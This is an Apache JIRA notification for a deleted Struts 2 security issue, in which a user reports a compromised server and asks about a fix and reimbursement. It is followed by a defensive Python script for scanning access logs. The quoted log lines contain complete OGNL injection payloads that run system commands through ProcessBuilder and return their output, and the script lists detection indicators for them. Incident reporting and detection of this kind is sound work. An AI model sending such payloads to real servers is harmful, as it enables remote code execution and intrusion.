[ 
https://issues.apache.org/jira/browse/WW-4304?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Lukasz Lenart deleted WW-4304:
------------------------------


> Security issues with Struts 2.3.x
> ---------------------------------
>
>                 Key: WW-4304
>                 URL: https://issues.apache.org/jira/browse/WW-4304
>             Project: Struts 2
>          Issue Type: Bug
>         Environment: Ubuntu on microsoft windows azure
>            Reporter: RAJA SEKHAR
>              Labels: security
>   Original Estimate: 96h
>  Remaining Estimate: 96h
>
> Hi,
> I have analyzed the logs for SMA and I found the following in the log files:
> 202.82.228.91 - - [24/Feb/2014:04:31:49 +0000] "GET 
> /testimonialsList.action?redirect:$%7B%23p%3Dnew%20java.lang.String(new+sun.misc.BASE64Decoder().decodeBuffer("d2hvYW1p")),%20%23a%3d%28new%20java.lang.ProcessBuilder%28%23p.split(%22%20%22)%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char%5B50000%5D,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23arr%3Dnew%20int[1],%23len%3D%23d.read%28%23e%29,%20%23arr.{(%23len%3D%3D-1)%3F%23{%23len%3D-1}%3A{%23matt.getWriter%28%29.print%28new%20java.lang.String%28%23e,0,%23len%29%29,%23len%3D%23d.read%28%23e%29}},%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29%7D
>  HTTP/1.1" 200 15
> 202.82.228.91 - - [24/Feb/2014:04:31:49 +0000] "GET 
> /testimonialsList.action?redirect:$%7B%23p%3Dnew%20java.lang.String(new+sun.misc.BASE64Decoder().decodeBuffer("dW5hbWUgLWE%3D")),%20%23a%3d%28new%20java.lang.ProcessBuilder%28%23p.split(%22%20%22)%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char%5B50000%5D,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23arr%3Dnew%20int[100],%23len%3D%23d.read%28%23e%29,%23arr.{(%23len%3D%3D-1)%3F%23{%23len%3D-1}%3A{%23matt.getWriter%28%29.print%28new%20java.lang.String%28%23e,0,%23len%29%29,%23len%3D%23d.read%28%23e%29}},%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29%7D
>  HTTP/1.1" 200 115
> I have seen these entries in the log file. Through this, the intruder has hacked the 
> system by finding the issue name /passwords etc., and he has taken control of 
> the system.
> By this he created files in the ROOT directory, and he was running DoS attacks 
> on the system. This led to large data transfer, and a bill of 1000$ 
> was generated to our customer. I found that the issue is fixed in version 
> 2.3.16. 
> I have the following questions:
> 1) Are these issues fixed in 2.3.16?
> 2) Since the root cause of the problem is with struts -2.3.1.1, do you 
> reimburse the bill?
> Please help us resolving this use



--
This message was sent by Atlassian JIRA
(v6.2#6252)
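
A log-triage sketch for entries like the ones quoted in this report, as an added example that is not part of the original message or of the Struts project: it percent-decodes each request and flags query strings that place a `${...}` or `%{...}` expression behind a `redirect:` prefix. The `action:` and `redirectAction:` prefixes, the indicator strings, the function names and the sample lines (documentation IP ranges) are assumptions constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Access-log line: client, timestamp, request line, status, size. The target is
# matched greedily because the logged payloads contain unescaped double quotes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) '
    r'(?P<target>.*) HTTP/[\d.]+" (?P<status>\d{3}) (?P<size>\d+|-)$')
# "redirect:" is the prefix seen in the report; the other two are assumptions.
PREFIX_RE = re.compile(r'(?:^|&)(redirect|redirectAction|action):\s*[$%]\{')
# Assumed indicator substrings, taken from what the quoted requests contain.
INDICATORS = ("java.lang.ProcessBuilder", "java.lang.Runtime",
              "#context", "getWriter(", "BASE64Decoder")

# Constructed sample lines (not real traffic); payloads are inert fragments.
SAMPLE_LINES = [
    '203.0.113.7 - - [24/Feb/2014:04:31:49 +0000] "GET /testimonialsList.action'
    '?redirect:$%7B%23a%3dnew%20java.lang.ProcessBuilder%28"x"%29%7D HTTP/1.1" 200 15',
    '203.0.113.7 - - [24/Feb/2014:04:32:10 +0000] "GET /index.action'
    '?id=1&action%3A%2525%257B%2523context%257D HTTP/1.1" 200 115',
    '198.51.100.4 - - [24/Feb/2014:04:33:02 +0000] "GET /testimonialsList.action'
    '?page=2&redirect=home HTTP/1.1" 200 5120',
    'truncated or malformed line',
]

def fully_decode(s, max_rounds=3):
    """Percent-decode repeatedly so double-encoded payloads are not missed."""
    for _ in range(max_rounds):
        decoded = unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    return s

def scan(lines):
    """Return a finding for each request with an expression behind a prefix."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # not an access-log line; skip rather than guess
        path, _, query = m["target"].partition("?")
        decoded = fully_decode(query)
        hit = PREFIX_RE.search(decoded)
        if hit:
            findings.append({
                "ip": m["ip"], "time": m["ts"], "path": path,
                "prefix": hit.group(1), "status": int(m["status"]),
                "indicators": [i for i in INDICATORS if i in decoded]})
    return findings
```

Calling `scan(SAMPLE_LINES)` returns two findings; a 200 status on a flagged request, as in the quoted entries, is a reason to review the host rather than proof that the expression was evaluated.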
